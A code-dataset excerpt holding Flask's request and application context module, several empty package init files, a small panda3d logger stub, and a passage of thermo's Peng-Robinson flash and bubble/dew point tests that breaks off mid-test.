repo_name stringlengths 5 100 | ref stringlengths 12 67 | path stringlengths 4 244 | copies stringlengths 1 8 | content stringlengths 0 1.05M ⌀ |
|---|---|---|---|---|
chiefspace/udemy-rest-api | refs/heads/master | udemy_rest_flask1/env/lib/python3.4/site-packages/flask/ctx.py | 170 | # -*- coding: utf-8 -*-
"""
flask.ctx
~~~~~~~~~
Implements the objects required to keep the context.
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import sys
from functools import update_wrapper
from werkzeug.exceptions import HTTPException
from .globals import _request_ctx_stack, _app_ctx_stack
from .signals import appcontext_pushed, appcontext_popped
from ._compat import BROKEN_PYPY_CTXMGR_EXIT, reraise
# a singleton sentinel value for parameter defaults
_sentinel = object()


class _AppCtxGlobals(object):
    """A plain namespace object bound to an application context.

    Attributes are stored directly in the instance ``__dict__``; the dict-like
    helpers below simply delegate to it.
    """

    def get(self, name, default=None):
        """Return attribute *name*, or *default* when it is not set."""
        return self.__dict__.get(name, default)

    def pop(self, name, default=_sentinel):
        """Remove attribute *name* and return its value.

        Raises :exc:`KeyError` when the attribute is missing and no
        *default* was supplied.
        """
        if default is not _sentinel:
            return self.__dict__.pop(name, default)
        return self.__dict__.pop(name)

    def setdefault(self, name, default=None):
        """Store *default* under *name* unless already set; return the value."""
        return self.__dict__.setdefault(name, default)

    def __contains__(self, item):
        return item in self.__dict__

    def __iter__(self):
        return iter(self.__dict__)

    def __repr__(self):
        ctx = _app_ctx_stack.top
        if ctx is None:
            return object.__repr__(self)
        return '<flask.g of %r>' % ctx.app.name
def after_this_request(f):
    """Register a function to run on this request's response object.

    The registered function is passed the response and must return the
    same response or a replacement.  This is most useful when something
    other than the view function itself -- for instance a decorator --
    needs to modify the response without first converting the view's
    return value into a response object.

    Example::

        @app.route('/')
        def index():
            @after_this_request
            def add_header(response):
                response.headers['X-Foo'] = 'Parachute'
                return response
            return 'Hello World!'

    .. versionadded:: 0.9
    """
    ctx = _request_ctx_stack.top
    ctx._after_request_functions.append(f)
    return f
def copy_current_request_context(f):
    """Decorator that snapshots the active request context for *f*.

    A copy of the current request context is taken at decoration time and
    pushed around every later invocation of the wrapped function, so the
    function can access ``flask.request`` even when it runs outside the
    original request -- typically in a greenlet.

    Example::

        import gevent
        from flask import copy_current_request_context

        @app.route('/')
        def index():
            @copy_current_request_context
            def do_some_work():
                # do some work here, it can access flask.request like you
                # would otherwise in the view function.
                ...
            gevent.spawn(do_some_work)
            return 'Regular response'

    .. versionadded:: 0.10
    """
    top = _request_ctx_stack.top
    if top is None:
        raise RuntimeError('This decorator can only be used at local scopes '
                           'when a request context is on the stack. For instance within '
                           'view functions.')
    ctx = top.copy()

    def inner(*args, **kwargs):
        with ctx:
            return f(*args, **kwargs)

    return update_wrapper(inner, f)
def has_request_context():
    """If you have code that wants to test if a request context is there or
    not this function can be used.  For instance, you may want to take
    advantage of request information if the request object is available,
    but fail silently if it is unavailable.
    ::

        class User(db.Model):

            def __init__(self, username, remote_addr=None):
                self.username = username
                if remote_addr is None and has_request_context():
                    remote_addr = request.remote_addr
                self.remote_addr = remote_addr

    Alternatively you can also just test any of the context bound objects
    (such as :class:`request` or :class:`g` for truthness)::

        class User(db.Model):

            def __init__(self, username, remote_addr=None):
                self.username = username
                if remote_addr is None and request:
                    remote_addr = request.remote_addr
                self.remote_addr = remote_addr

    Returns ``True`` when a request context is currently active.

    .. versionadded:: 0.7
    """
    # A request context is active exactly when something has been pushed
    # onto the request context stack.
    return _request_ctx_stack.top is not None
def has_app_context():
    """Works like :func:`has_request_context` but for the application
    context.  You can also just do a boolean check on the
    :data:`current_app` object instead.

    Returns ``True`` when an application context is currently active.

    .. versionadded:: 0.9
    """
    # An application context is active exactly when something has been
    # pushed onto the application context stack.
    return _app_ctx_stack.top is not None
class AppContext(object):
    """The application context binds an application object implicitly
    to the current thread or greenlet, similar to how the
    :class:`RequestContext` binds request information.  The application
    context is also implicitly created if a request context is created
    but the application is not on top of the individual application
    context.
    """

    def __init__(self, app):
        self.app = app
        # URL adapter without a bound request; used for url_for outside
        # of a request.
        self.url_adapter = app.create_url_adapter(None)
        # The object exposed as ``flask.g`` while this context is active.
        self.g = app.app_ctx_globals_class()

        # Like request context, app contexts can be pushed multiple times
        # but there a basic "refcount" is enough to track them.
        self._refcnt = 0

    def push(self):
        """Binds the app context to the current context."""
        self._refcnt += 1
        # Python 2 keeps exception state per thread; clear it so the new
        # context does not observe a stale exception.  ``sys.exc_clear``
        # does not exist on Python 3, where this is a no-op.
        if hasattr(sys, 'exc_clear'):
            sys.exc_clear()
        _app_ctx_stack.push(self)
        appcontext_pushed.send(self.app)

    def pop(self, exc=_sentinel):
        """Pops the app context.

        :param exc: the exception (if any) to pass to the teardown
                    functions; defaults to the currently handled exception.
        """
        try:
            self._refcnt -= 1
            # Teardown functions run only when the outermost push is popped.
            if self._refcnt <= 0:
                if exc is _sentinel:
                    exc = sys.exc_info()[1]
                self.app.do_teardown_appcontext(exc)
        finally:
            # Pop the stack even if a teardown function raised, so the
            # stack cannot be left unbalanced.
            rv = _app_ctx_stack.pop()
        assert rv is self, 'Popped wrong app context. (%r instead of %r)' \
            % (rv, self)
        appcontext_popped.send(self.app)

    def __enter__(self):
        self.push()
        return self

    def __exit__(self, exc_type, exc_value, tb):
        self.pop(exc_value)

        # Work around PyPy swallowing exceptions raised around ``__exit__``;
        # re-raise manually so the original error is not lost.
        if BROKEN_PYPY_CTXMGR_EXIT and exc_type is not None:
            reraise(exc_type, exc_value, tb)
class RequestContext(object):
    """The request context contains all request relevant information.  It is
    created at the beginning of the request and pushed to the
    `_request_ctx_stack` and removed at the end of it.  It will create the
    URL adapter and request object for the WSGI environment provided.

    Do not attempt to use this class directly, instead use
    :meth:`~flask.Flask.test_request_context` and
    :meth:`~flask.Flask.request_context` to create this object.

    When the request context is popped, it will evaluate all the
    functions registered on the application for teardown execution
    (:meth:`~flask.Flask.teardown_request`).

    The request context is automatically popped at the end of the request
    for you.  In debug mode the request context is kept around if
    exceptions happen so that interactive debuggers have a chance to
    introspect the data.  With 0.4 this can also be forced for requests
    that did not fail and outside of ``DEBUG`` mode.  By setting
    ``'flask._preserve_context'`` to ``True`` on the WSGI environment the
    context will not pop itself at the end of the request.  This is used by
    the :meth:`~flask.Flask.test_client` for example to implement the
    deferred cleanup functionality.

    You might find this helpful for unittests where you need the
    information from the context local around for a little longer.  Make
    sure to properly :meth:`~werkzeug.LocalStack.pop` the stack yourself in
    that situation, otherwise your unittests will leak memory.
    """

    def __init__(self, app, environ, request=None):
        self.app = app
        if request is None:
            request = app.request_class(environ)
        self.request = request
        self.url_adapter = app.create_url_adapter(self.request)
        self.flashes = None
        self.session = None

        # Request contexts can be pushed multiple times and interleaved with
        # other request contexts.  Now only if the last level is popped we
        # get rid of them.  Additionally if an application context is missing
        # one is created implicitly so for each level we add this information
        self._implicit_app_ctx_stack = []

        # indicator if the context was preserved.  Next time another context
        # is pushed the preserved context is popped.
        self.preserved = False

        # remembers the exception for pop if there is one in case the context
        # preservation kicks in.
        self._preserved_exc = None

        # Functions that should be executed after the request on the response
        # object.  These will be called before the regular "after_request"
        # functions.
        self._after_request_functions = []

        # Match the URL right away so ``request.url_rule``/``view_args`` (or
        # ``routing_exception``) are populated before dispatch.
        self.match_request()

    # ``g`` lives on the *application* context, not here; these accessors
    # proxy attribute access through to the top of the app context stack.
    def _get_g(self):
        return _app_ctx_stack.top.g
    def _set_g(self, value):
        _app_ctx_stack.top.g = value
    g = property(_get_g, _set_g)
    del _get_g, _set_g

    def copy(self):
        """Creates a copy of this request context with the same request object.
        This can be used to move a request context to a different greenlet.
        Because the actual request object is the same this cannot be used to
        move a request context to a different thread unless access to the
        request object is locked.

        .. versionadded:: 0.10
        """
        return self.__class__(self.app,
            environ=self.request.environ,
            request=self.request
        )

    def match_request(self):
        """Can be overridden by a subclass to hook into the matching
        of the request.
        """
        try:
            # ``return_rule=True`` yields the Rule object itself rather
            # than just the endpoint name.
            url_rule, self.request.view_args = \
                self.url_adapter.match(return_rule=True)
            self.request.url_rule = url_rule
        except HTTPException as e:
            # Routing failures (e.g. 404/405) are stored and raised later
            # during dispatch instead of propagating here.
            self.request.routing_exception = e

    def push(self):
        """Binds the request context to the current context."""
        # If an exception occurs in debug mode or if context preservation is
        # activated under exception situations exactly one context stays
        # on the stack.  The rationale is that you want to access that
        # information under debug situations.  However if someone forgets to
        # pop that context again we want to make sure that on the next push
        # it's invalidated, otherwise we run at risk that something leaks
        # memory.  This is usually only a problem in test suite since this
        # functionality is not active in production environments.
        top = _request_ctx_stack.top
        if top is not None and top.preserved:
            top.pop(top._preserved_exc)

        # Before we push the request context we have to ensure that there
        # is an application context.
        app_ctx = _app_ctx_stack.top
        if app_ctx is None or app_ctx.app != self.app:
            app_ctx = self.app.app_context()
            app_ctx.push()
            self._implicit_app_ctx_stack.append(app_ctx)
        else:
            self._implicit_app_ctx_stack.append(None)

        # Clear stale per-thread exception state on Python 2 (no-op on 3.x).
        if hasattr(sys, 'exc_clear'):
            sys.exc_clear()

        _request_ctx_stack.push(self)

        # Open the session at the moment that the request context is
        # available.  This allows a custom open_session method to use the
        # request context (e.g. code that access database information
        # stored on `g` instead of the appcontext).
        self.session = self.app.open_session(self.request)
        if self.session is None:
            self.session = self.app.make_null_session()

    def pop(self, exc=_sentinel):
        """Pops the request context and unbinds it by doing that.  This will
        also trigger the execution of functions registered by the
        :meth:`~flask.Flask.teardown_request` decorator.

        .. versionchanged:: 0.9
           Added the `exc` argument.
        """
        app_ctx = self._implicit_app_ctx_stack.pop()

        try:
            clear_request = False
            # Teardown and request release happen only when the outermost
            # level of a multiply-pushed context is being popped.
            if not self._implicit_app_ctx_stack:
                self.preserved = False
                self._preserved_exc = None
                if exc is _sentinel:
                    exc = sys.exc_info()[1]
                self.app.do_teardown_request(exc)

                # If this interpreter supports clearing the exception information
                # we do that now.  This will only go into effect on Python 2.x,
                # on 3.x it disappears automatically at the end of the exception
                # stack.
                if hasattr(sys, 'exc_clear'):
                    sys.exc_clear()

                request_close = getattr(self.request, 'close', None)
                if request_close is not None:
                    request_close()
                clear_request = True
        finally:
            # Always rebalance the stack, even if teardown raised.
            rv = _request_ctx_stack.pop()

            # get rid of circular dependencies at the end of the request
            # so that we don't require the GC to be active.
            if clear_request:
                rv.request.environ['werkzeug.request'] = None

            # Get rid of the app as well if necessary.
            if app_ctx is not None:
                app_ctx.pop(exc)

            assert rv is self, 'Popped wrong request context. ' \
                '(%r instead of %r)' % (rv, self)

    def auto_pop(self, exc):
        # Keep the context alive instead of popping when preservation was
        # requested (test client) or an exception occurred with the app
        # configured to preserve contexts on exceptions; otherwise pop.
        if self.request.environ.get('flask._preserve_context') or \
           (exc is not None and self.app.preserve_context_on_exception):
            self.preserved = True
            self._preserved_exc = exc
        else:
            self.pop(exc)

    def __enter__(self):
        self.push()
        return self

    def __exit__(self, exc_type, exc_value, tb):
        # do not pop the request stack if we are in debug mode and an
        # exception happened.  This will allow the debugger to still
        # access the request object in the interactive shell.  Furthermore
        # the context can be force kept alive for the test client.
        # See flask.testing for how this works.
        self.auto_pop(exc_value)

        # Work around PyPy swallowing exceptions raised around ``__exit__``.
        if BROKEN_PYPY_CTXMGR_EXIT and exc_type is not None:
            reraise(exc_type, exc_value, tb)

    def __repr__(self):
        return '<%s \'%s\' [%s] of %s>' % (
            self.__class__.__name__,
            self.request.url,
            self.request.method,
            self.app.name,
        )
|
sriprasanna/django-1.3.1 | refs/heads/master | django/contrib/gis/tests/geo3d/__init__.py | 12133432 | |
michath/ConMonkey | refs/heads/master | python/mozbuild/mozpack/chrome/__init__.py | 12133432 | |
py-geek/City-Air | refs/heads/master | venv/lib/python2.7/site-packages/allauth/socialaccount/providers/openid/migrations/__init__.py | 12133432 | |
sctigercat1/panda3d | refs/heads/master | direct/src/directnotify/LoggerGlobal.py | 12 | """instantiate global Logger object"""
import Logger
defaultLogger = Logger.Logger()
|
apanju/odoo | refs/heads/8.0 | addons/website_instantclick/__init__.py | 12133432 | |
Tejal011089/med2-app | refs/heads/master | selling/doctype/customer_discount/__init__.py | 12133432 | |
alforro/sgpa2015 | refs/heads/master | autenticacion/__init__.py | 12133432 | |
rvmoura96/projeto-almoxarifado | refs/heads/master | myvenv/Lib/site-packages/django/conf/locale/ml/__init__.py | 12133432 | |
CalebBell/thermo | refs/heads/master | tests/test_property_package_eos.py | 1 | # -*- coding: utf-8 -*-
'''Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2018, Caleb Bell <Caleb.Andrew.Bell@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.'''
import numpy as np
from numpy.testing import assert_allclose
import pytest
from thermo.utils import TPD
from thermo.eos import *
from thermo.eos_mix import *
from scipy.misc import derivative
from scipy.optimize import minimize, newton
from math import log, exp, sqrt, log10
from thermo import Mixture
from thermo.property_package import *
from fluids.numerics import linspace, logspace, normalize
from thermo.property_package_constants import (PropertyPackageConstants, PR_PKG)
@pytest.mark.deprecated
def test_bubble_T_PR():
    """Bubble-point temperature sweep for CO2/n-hexane with the PR EOS.

    A long, log-spaced pressure grid is used so that convergence problems
    or singularities show up; the last point near 8 MPa is known to be
    hard to converge.  (Copied to VL!)
    """
    pressures = np.logspace(np.log10(1e3), np.log10(8e6), 100).tolist()

    # Reference values - working for sure!  A Lagrange multiplier is
    # needed for the hardest points.
    T_bubbles_expect = [135.77792634341301, 136.56179975223873, 137.35592304111714, 138.1605125904237, 138.97579118069618, 139.80198815378043, 140.63933971310234, 141.48808915266713, 142.34848716775062, 143.22079210796352, 144.10527026879004, 145.00219623035326, 145.9118531621595, 146.8345331709676, 147.77053765471518, 148.7201776796149, 149.68377437184307, 150.66165932879846, 151.65417505244912, 152.6616753977778, 153.68452605664353, 154.72310505184726, 155.7778032642612, 156.8490249894867, 157.937188514101, 159.04272673536184, 160.16608780166473, 161.30773579673297, 162.46815145564204, 163.64783292476886, 164.84729656230823, 166.06707778415586, 167.30773196086088, 168.56983536585116, 169.8539861804285, 171.16080556094636, 172.49093877035423, 173.84505638241404, 175.22385556194536, 176.6280614293828, 178.058428515323, 179.51574231484207, 181.00082094865053, 182.5145169422077, 184.0577191341151, 185.63135472512306, 187.2363914833706, 188.8738401205766, 190.54475685783353, 192.25024620138348, 193.991463951159, 195.76962046909824, 197.5859842371162, 199.4418857394953, 201.33872170960848, 203.27795978657647, 205.26114363572563, 207.28989859303456, 209.36593790645554, 211.49106965667633, 213.66720445521423, 215.89636403432021, 218.18069086349888, 220.52245895198226, 222.92408602593875, 225.3881473051149, 227.91739114691686, 230.5147568796014, 233.18339521130144, 235.92669168167328, 238.74829372436815, 241.65214202994656, 244.64250705759693, 247.7240317371467, 250.90178165300227, 254.18130431821905, 257.5686995555806, 261.07070353354993, 264.69478970158224, 268.44929079409445, 272.3435473154688, 276.3880896135361, 280.59486299764814, 284.9775086709067, 289.5517180159047, 294.3356847958481, 299.35069043485873, 304.62187400558975, 310.17926492998157, 316.059200210731, 322.3063237832385, 328.97650301847204, 336.14126110695065, 343.8948656757251, 352.36642480869347, 361.7423599546769, 372.31333661508177, 384.5907961800425, 399.6948959805394, 422.0030866468656]

    mix = Mixture(['CO2', 'n-hexane'], zs=[.5, .5], T=300, P=1E6)
    pkg = GceosBase(eos_mix=PRMIX, VaporPressures=mix.VaporPressures,
                    Tms=mix.Tms, Tbs=mix.Tbs, Tcs=mix.Tcs, Pcs=mix.Pcs,
                    omegas=mix.omegas, kijs=[[0, 0], [0, 0]], eos_kwargs=None)

    T_bubbles = [pkg.bubble_T(P, mix.zs, maxiter=20, xtol=1e-10,
                              maxiter_initial=20, xtol_initial=1e-1)[-3]
                 for P in pressures]
    assert_allclose(T_bubbles, T_bubbles_expect, rtol=5e-6)
@pytest.mark.deprecated
def test_PR_four_bubble_dew_cases():
    """Bubble/dew point T and P for furfural + furfuryl alcohol (PR EOS)."""
    mix = Mixture(['furfural', 'furfuryl alcohol'], zs=[.5, .5], T=300, P=1E6)
    pkg = GceosBase(eos_mix=PRMIX, VaporPressures=mix.VaporPressures,
                    Tms=[235.9, 250.35], Tbs=[434.65, 441.15],
                    Tcs=[670.0, 632.0], Pcs=[5510000.0, 5350000.0],
                    omegas=[0.4522, 0.734], kijs=[[0, 0], [0, 0]],
                    eos_kwargs=None, HeatCapacityGases=mix.HeatCapacityGases)
    zs = mix.zs

    # Reference values strongly believed to be correct!
    assert_allclose(pkg.bubble_T(P=1e6, zs=zs)[-3], 539.1838522423355, atol=.1)
    assert_allclose(pkg.dew_T(P=1e6, zs=zs)[-3], 540.208169750248, atol=.1)
    assert_allclose(pkg.dew_P(T=600, zs=zs)[-3], 2702616.6490743402, rtol=1e-4)
    assert_allclose(pkg.bubble_P(T=600, zs=zs)[-3], 2766476.7473238516, rtol=1e-4)
@pytest.mark.deprecated
def test_C1_C10_PT_flash():
    """PT flash of an equimolar C1-C10 n-alkane mixture; checks V_over_F."""
    names = ['methane', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9', 'C10']
    mix = Mixture(names, zs=[.1]*10, T=300, P=1E6)
    pkg = GceosBase(eos_mix=PRMIX, VaporPressures=mix.VaporPressures,
                    Tms=mix.Tms, Tbs=mix.Tbs, Tcs=mix.Tcs, Pcs=mix.Pcs,
                    omegas=mix.omegas, kijs=None, eos_kwargs=None)
    pkg.flash(mix.zs, T=300, P=1e5)
    assert_allclose(pkg.V_over_F, 0.3933480636546702, atol=.001)
@pytest.mark.deprecated
def test_ternary_4_flashes_2_algorithms():
    """Bubble and dew flashes for a pentane/hexane/heptane ternary.

    Sweeps temperature solving TVF problems (VF=0 and VF=1), checks the
    resulting pressures against stored references, then re-solves every
    point as the equivalent PVF problem and as a nearly-saturated flash
    (VF=0+1e-9 / VF=1-1e-9) to exercise a second algorithm path.
    """
    zs = [0.8168, 0.1501, 0.0331]
    m = Mixture(['n-pentane', 'n-hexane', 'heptane'], zs=zs, T=300, P=1E6)
    kijs = [[0, 0.00076, 0.00171], [0.00076, 0, 0.00061], [0.00171, 0.00061, 0]]
    Tcs = [469.7, 507.6, 540.2]
    Pcs = [3370000.0, 3025000.0, 2740000.0]
    omegas = [0.251, 0.2975, 0.3457]
    pkg = GceosBase(eos_mix=PRMIX, VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs,
                    Tcs=Tcs, Pcs=Pcs, omegas=omegas,
                    kijs=kijs, eos_kwargs=None,
                    HeatCapacityGases=m.HeatCapacityGases)

    # Test the TVF dew and bubble functions
    Ts = linspace(160, 473)  # Can go up to 474 K in some ones
    P_dews = []
    P_bubbles = []
    P_dews_expect = [0.13546805712060028, 0.43921188284030244, 1.2845937999086763, 3.4284388636658223, 8.432934762206317, 19.28325222813278, 41.304893136512625, 83.4340609062355, 159.8684378673581, 292.0910726014042, 511.22209088685435, 860.6178486961774, 1398.6103635474976, 2201.2649842930023, 3365.0325891826838, 5009.183244809382, 7277.928645001543, 10342.16726173515, 14400.815256785363, 19681.7145007659, 26442.1339934372, 34968.90099430364, 45578.21259245172, 58615.18736373379, 74453.22081253518, 93493.20841630214, 116162.69734460281, 142915.02335020038, 174228.483859415, 210605.5927100339, 252572.45694034494, 300678.3120515243, 355495.2497147813, 417618.1714535647, 487665.00399456796, 566277.2176110205, 654120.6992511221, 751887.0498581398, 860295.4040565268, 980094.9175170006, 1112068.1463153881, 1257035.6798685808, 1415862.6391328266, 1589468.1351378255, 1778839.7877655022, 1985057.6930205086, 2209338.09186709, 2453124.6502311486, 2718322.7103527053, 3008161.494037711]
    P_bubbles_expect = [1.6235349125052008, 4.093581157610554, 9.575333470191898, 20.9520396276609, 43.19443917687544, 84.41963574404814, 157.25506477949756, 280.5086157382652, 481.11896195432473, 796.3336480902728, 1276.039624284318, 1985.1548551180522, 3005.982245837768, 4440.428884348238, 6412.003702807469, 9067.523338810985, 12578.476805989876, 17142.0220330821, 22981.609086464254, 30347.244137353322, 39515.42378295007, 50788.78061416531, 64495.487917554194, 80988.47447946836, 100644.50024948097, 123863.1408495057, 151065.7243154966, 182694.25768005836, 219210.37457192744, 261094.32829701997, 308844.0480934111, 362974.2694768574, 424015.74270421825, 492514.5160789749, 569031.2825613177, 654140.7680276675, 748431.1260918825, 852503.2852406674, 966970.1650283068, 1092455.6319079874, 1229592.988381081, 1379022.655075611, 1541388.4595460077, 1717331.4675977635, 1907479.294701055, 2112426.5546414126, 2332696.247164788, 2568654.2410637783, 2820281.571897286, 3086319.669072729]
    # The two lowest temperatures are skipped here (convergence).
    for T in Ts[2:]:
        pkg.flash(T=T, VF=0, zs=zs)
        P_bubbles.append(pkg.P)
        pkg.flash(T=T, VF=1, zs=zs)
        P_dews.append(pkg.P)
    assert_allclose(P_bubbles, P_bubbles_expect[2:], rtol=5e-5)
    assert_allclose(P_dews, P_dews_expect[2:], rtol=5e-5)

    # For each point, solve it as a T problem.
    for P, T in zip(P_bubbles, Ts[2:]):
        pkg.flash(P=P, VF=0, zs=zs)
        assert_allclose(pkg.T, T, rtol=5e-5)
    for P, T in zip(P_dews, Ts[2:]):
        pkg.flash(P=P, VF=1, zs=zs)
        assert_allclose(pkg.T, T, rtol=5e-5)

    P_dews_almost = []
    P_bubbles_almost = []
    for T in Ts[4:]:
        # Some convergence issues in sequential_substitution_VL at lower pressures
        pkg.flash(T=T, VF=0+1e-9, zs=zs)
        P_bubbles_almost.append(pkg.P)
        pkg.flash(T=T, VF=1-1e-9, zs=zs)
        P_dews_almost.append(pkg.P)
    assert_allclose(P_bubbles[2:], P_bubbles_almost, rtol=5e-5)
    assert_allclose(P_dews[2:], P_dews_almost, rtol=5e-5)

    # Some points fail here too!
    for P, T in zip(P_dews_expect[4:-1], Ts[4:-1]):
        pkg.flash(P=P, VF=1-1e-9, zs=zs)
        assert_allclose(P, pkg.P)
    for P, T in zip(P_bubbles_expect[2:-2], Ts[2:-2]):
        pkg.flash(P=P, VF=0+1e-9, zs=zs)
        assert_allclose(P, pkg.P)
@pytest.mark.deprecated
@pytest.mark.slow
def test_PVF_parametric_binary_vs_CoolProp():
    """Compare thermo's P, VF flash temperatures against CoolProp for the
    ethane/heptane binary over a wide pressure range.

    CoolProp's PR implementation uses c1=0.45724, c2=0.07780, so PRMIX's
    class-level constants are temporarily replaced to make both sides use
    identical EOS parameters.  The constants are restored in a ``finally``
    block so that a failing assertion cannot leak the modified values into
    other tests (previously they were only restored on success).
    """
    import CoolProp.CoolProp as CP
    zs = [0.4, 0.6]
    m = Mixture(['Ethane', 'Heptane'], zs=zs, T=300, P=1E6)
    kij = .0067
    kijs = [[0, kij], [kij, 0]]
    Tcs = [305.322, 540.13]
    Pcs = [4872200.0, 2736000.0]
    omegas = [0.099, 0.349]

    c1, c2 = PRMIX.c1, PRMIX.c2
    PRMIX.c1, PRMIX.c2 = 0.45724, 0.07780
    try:
        pkg = GceosBase(eos_mix=PRMIX, VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs,
                        Tcs=Tcs, Pcs=Pcs, omegas=omegas,
                        kijs=kijs, eos_kwargs=None,
                        HeatCapacityGases=m.HeatCapacityGases)
        pkg.FLASH_VF_TOL = 1e-12

        AS = CP.AbstractState("PR", "Ethane&Heptane")
        AS.set_mole_fractions(zs)
        AS.set_binary_interaction_double(0, 1, "kij", kij)

        Ps = [10, 100, 1000, 1e4, 5e4, 1e5, 5e5, 1e6, 2e6]
        for P in Ps:
            # Up above 2e6, issues arise in thermo
            VFs = linspace(0, 1)
            CP_Ts = []
            Ts_calc = []
            for VF in VFs:
                try:
                    AS.update(CP.PQ_INPUTS, P, VF)
                    CP_Ts.append(AS.T())
                    pkg.flash(VF=VF, P=P, zs=zs)
                    Ts_calc.append(pkg.T)
                except Exception as e:
                    # Best-effort: skip points where either solver fails to
                    # converge, but leave a trace of what was skipped.
                    print(VF, e)
            # the low pressure and highest pressure regions are the greatest errors
            # can go down to 1e-6 tol for all, most are 1e-12
            assert_allclose(CP_Ts, Ts_calc, rtol=1e-5)
    finally:
        # Always undo the class-level monkey-patch of the PR constants.
        PRMIX.c1, PRMIX.c2 = c1, c2
@pytest.mark.deprecated
@pytest.mark.slow
def test_PVF_parametric_binary_zs_vs_CoolProp():
    '''More advanced test of the above. Changes mole fractions.
    To get more errors, reduce the mole fractions; and wide the P range.

    As in the test above, PRMIX's class constants are swapped for
    CoolProp's values and restored in a ``finally`` block so a failure
    cannot leak the change into other tests.
    '''
    import CoolProp.CoolProp as CP
    zs = [0.4, 0.6]
    m = Mixture(['Ethane', 'Heptane'], zs=zs, T=300, P=1E6)
    kij = .0067
    kijs = [[0, kij], [kij, 0]]
    Tcs = [305.322, 540.13]
    Pcs = [4872200.0, 2736000.0]
    omegas = [0.099, 0.349]

    c1, c2 = PRMIX.c1, PRMIX.c2
    PRMIX.c1, PRMIX.c2 = 0.45724, 0.07780
    try:
        pkg = GceosBase(eos_mix=PRMIX, VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs,
                        Tcs=Tcs, Pcs=Pcs, omegas=omegas,
                        kijs=kijs, eos_kwargs=None,
                        HeatCapacityGases=m.HeatCapacityGases)
        pkg.FLASH_VF_TOL = 1e-12

        AS = CP.AbstractState("PR", "Ethane&Heptane")
        AS.set_binary_interaction_double(0, 1, "kij", kij)

        zis = linspace(.01, .98, 5)
        for zi in zis:
            zs = [1-zi, zi]
            Ps = [100, 1000, 1e4, 5e4, 1e5, 5e5, 1e6]
            for P in Ps:
                # Up above 2e6, issues arise in thermo
                VFs = linspace(0, 1)
                CP_Ts = []
                Ts_calc = []
                for VF in VFs:
                    try:
                        AS.set_mole_fractions(zs)
                        AS.update(CP.PQ_INPUTS, P, VF)
                        CP_Ts.append(AS.T())
                        pkg.flash(VF=VF, P=P, zs=zs)
                        Ts_calc.append(pkg.T)
                    except Exception as e:
                        # Best-effort: skip non-converging points but keep
                        # a trace of which combination was skipped.
                        print(zi, P, VF, e)
                assert_allclose(CP_Ts, Ts_calc, rtol=1e-5)
    finally:
        # Always undo the class-level monkey-patch of the PR constants.
        PRMIX.c1, PRMIX.c2 = c1, c2
@pytest.mark.deprecated
@pytest.mark.xfail
def test_failing_sequential_subs():
    """Known-failing sequential substitution case at very low pressure."""
    zs = [0.8168, 0.1501, 0.0331]
    mix = Mixture(['n-pentane', 'n-hexane', 'heptane'], zs=zs, T=300, P=1E6)
    kijs = [[0, 0.00076, 0.00171], [0.00076, 0, 0.00061], [0.00171, 0.00061, 0]]
    Tcs = [469.7, 507.6, 540.2]
    Pcs = [3370000.0, 3025000.0, 2740000.0]
    omegas = [0.251, 0.2975, 0.3457]
    pkg = GceosBase(eos_mix=PRMIX, VaporPressures=mix.VaporPressures,
                    Tms=mix.Tms, Tbs=mix.Tbs, Tcs=Tcs, Pcs=Pcs,
                    omegas=omegas, kijs=kijs, eos_kwargs=None,
                    HeatCapacityGases=mix.HeatCapacityGases)
    eos_pkg = pkg.to_TP_zs(T=180, P=4, zs=zs)
    eos_pkg.sequential_substitution_VL(maxiter=10, xtol=1E-7)
@pytest.mark.deprecated
def test_PRMIX_pkg_H():
    """Molar enthalpy differences between pairs of flashed states for an
    ethane/heptane mixture with the PR EOS package.

    Each case flashes two states (T/P or T/VF specifications), asserts the
    expected phase, and checks the enthalpy difference against a reference
    value.  (This version removes the bare no-op ``H1 - H2`` expression
    statements and duplicated ``pkg.Hm`` reads present in the original.)
    """
    zs = [0.4, 0.6]
    m = Mixture(['Ethane', 'Heptane'], zs=zs, T=300, P=1E6)
    kij = .0
    kijs = [[0, kij], [kij, 0]]
    Tcs = [305.322, 540.13]
    Pcs = [4872200.0, 2736000.0]
    omegas = [0.099, 0.349]
    pkg = GceosBase(eos_mix=PRMIX, VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs,
                    Tcs=Tcs, Pcs=Pcs, omegas=omegas,
                    kijs=kijs, eos_kwargs=None,
                    HeatCapacityGases=m.HeatCapacityGases)
    pkg.FLASH_VF_TOL = 1e-12

    # Case gas-gas pressure difference
    pkg.flash(T=450, P=400, zs=m.zs)
    H1 = pkg.Hm
    assert pkg.phase == 'g'
    pkg.flash(T=450, P=1e6, zs=m.zs)
    H2 = pkg.Hm
    assert pkg.phase == 'g'
    assert_allclose(H1 - H2, 1638.19303081, rtol=1e-3)

    # Case gas to VF = 0.5 at same T
    pkg.flash(T=350, P=400, zs=m.zs)
    assert pkg.phase == 'g'
    H1 = pkg.Hm
    pkg.flash(T=350, VF=.5, zs=m.zs)
    assert pkg.phase == 'l/g'
    H2 = pkg.Hm
    assert_allclose(H1 - H2, 16445.143155, rtol=1e-3)

    # Higher pressure, less matching (gas constant diff probably; gas-liquid difference! No partial phase.)
    pkg.flash(T=450, P=400, zs=m.zs)
